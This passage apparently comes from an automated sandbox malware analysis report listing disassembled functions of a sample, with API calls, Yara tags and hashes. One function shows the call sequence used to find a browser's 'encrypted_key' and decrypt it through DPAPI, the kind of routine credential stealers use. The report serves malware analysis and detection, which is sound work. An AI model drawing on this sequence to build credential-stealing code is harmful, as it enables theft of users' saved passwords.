                                        • Instruction Fuzzy Hash: FF414272D10119AFCB04EFA4E856BFEB778AF84304F00C418E41677255DB79AA09CFA6
                                        Function 00919CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                                          • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                                          • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                                          • Part of subcall function 00919B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                                          • Part of subcall function 00919B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                                          • Part of subcall function 00919B60: LocalFree.KERNEL32(?), ref: 00919BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                                        • Instruction ID: 0ed9e4f217e78fcc01e08c80395e90a18b51e0be14fe0dae4055085bd0bd5a5f
                                        • Opcode Fuzzy Hash: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                                        • Instruction Fuzzy Hash: A63112B6E1010DABCB04DFE4DD95BEFB7B8AF88304F144519F915A7285EB309A44CBA1
                                        Function 009292E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00923AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00923AEE,?), ref: 009292FC
                                        • GetFileSizeEx.KERNEL32(000000FF,00923AEE), ref: 00929319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00929327
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                                        • Instruction ID: a5fcdf055f9a6325d074450794e9116230467aa246f1962276b417f33552e284
                                        • Opcode Fuzzy Hash: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                                        • Instruction Fuzzy Hash: C5F04F35E40308BBDF10DFB0EC59F9E77B9AB4C711F10C694B651A72C4DA749A018B40
                                        Function 0092C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 0092C74E
                                          • Part of subcall function 0092BF9F: __amsg_exit.LIBCMT ref: 0092BFAF
                                        • __getptd.LIBCMT ref: 0092C765
                                        • __amsg_exit.LIBCMT ref: 0092C773
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0092C797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                                        • Instruction ID: 2b0960ba740b7bb46acd8b438f084508203093b3282552c26cb6b4703663d6ac
                                        • Opcode Fuzzy Hash: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                                        • Instruction Fuzzy Hash: 60F0BEB39047309BD721BBB8BC07B9E33E46F80720F214249F505F62DBCB685940AE96
                                        Function 00924F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924F7A
                                        • lstrcat.KERNEL32(?,00931070), ref: 00924F97
                                        • lstrcat.KERNEL32(?,006B9228), ref: 00924FAB
                                        • lstrcat.KERNEL32(?,00931074), ref: 00924FBD
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                                          • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                                          • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                                          • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                                        • Instruction ID: 47bc4c929d7c70b7fea9276d87625971ea1f8dded042f19f2dce2d863aae4f97
                                        • Opcode Fuzzy Hash: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                                        • Instruction Fuzzy Hash: 2A21887A90031867C754F760FC46FEE333DABD4701F004694B659A3185EE75A6C88F92